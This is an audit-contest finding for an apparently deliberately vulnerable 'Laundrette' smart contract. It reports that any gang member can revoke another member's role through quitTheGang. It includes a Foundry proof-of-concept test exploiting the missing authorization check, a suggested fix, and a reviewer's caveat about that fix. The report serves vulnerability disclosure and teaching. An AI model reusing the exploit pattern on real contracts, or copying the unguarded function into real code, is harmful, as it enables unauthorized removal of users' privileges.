Submission Details
Severity: medium
Valid

Every gang member can kick other gang members out of the gang.

Summary

Every gang member can kick other gang members out of the gang.

Vulnerability Details

Any gang member can call Laundrette::quitTheGang with another gang member's address as the argument. The call revokes that member's gangmember role, as the test below shows.

Paste this into Laundrette.t.sol and run forge test --match-test test_everyGangMemberCanKickAnotherMemberOut:

function test_everyGangMemberCanKickAnotherMemberOut() public {
    address gangMemberOne = makeAddr("Tommy Shelby");
    address gangMemberTwo = makeAddr("Michael Shelby");
    joinGang(gangMemberOne);
    // Add the second gang member and give them guns for test purposes
    vm.startPrank(godFather);
    laundrette.addToTheGang(gangMemberTwo);
    laundrette.putGunsInTheSuspendedCeiling(gangMemberTwo, 3);
    assertEq(weaponShelf.getAccountAmount(gangMemberTwo), 3);
    vm.stopPrank();
    // gangMemberTwo can call takeGuns because they are still a gang member
    vm.prank(gangMemberTwo);
    laundrette.takeGuns(gangMemberTwo, 1);
    assertEq(weaponShelf.getAccountAmount(gangMemberTwo), 2);
    // gangMemberOne kicks gangMemberTwo out of the gang
    vm.prank(gangMemberOne);
    laundrette.quitTheGang(gangMemberTwo);
    // takeGuns should now revert because gangMemberTwo is no longer a gang member
    vm.prank(gangMemberTwo);
    vm.expectRevert();
    laundrette.takeGuns(gangMemberTwo, 1);
}

Impact

A malicious member can remove every other gang member from the gang.

Tools Used

Manual Review

Unit tests

Recommendations

Add the isAuthorizedOrRevert modifier to the function:

+ function quitTheGang(address account) external onlyRole("gangmember") isAuthorizedOrRevert{
kernel.revokeRole(Role.wrap("gangmember"), account);
}
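Review bot: the `+` line applies `isAuthorizedOrRevert` with no argument while the body still revokes the role of the caller-supplied `account`; the fix only closes the issue if the modifier ties `msg.sender` to `account` (a member may revoke only their own role, with the godfather as the privileged exception). If the modifier does not take the target account as a parameter, pass it, e.g. `isAuthorizedOrRevert(account)`, or add an explicit `if (msg.sender != account) revert` check before `kernel.revokeRole(...)`. The test above should then be extended to assert that `quitTheGang(gangMemberTwo)` called by `gangMemberOne` reverts, so the regression is covered.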

Updates

Lead Judging Commences

n0kto Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Gang members ban other members
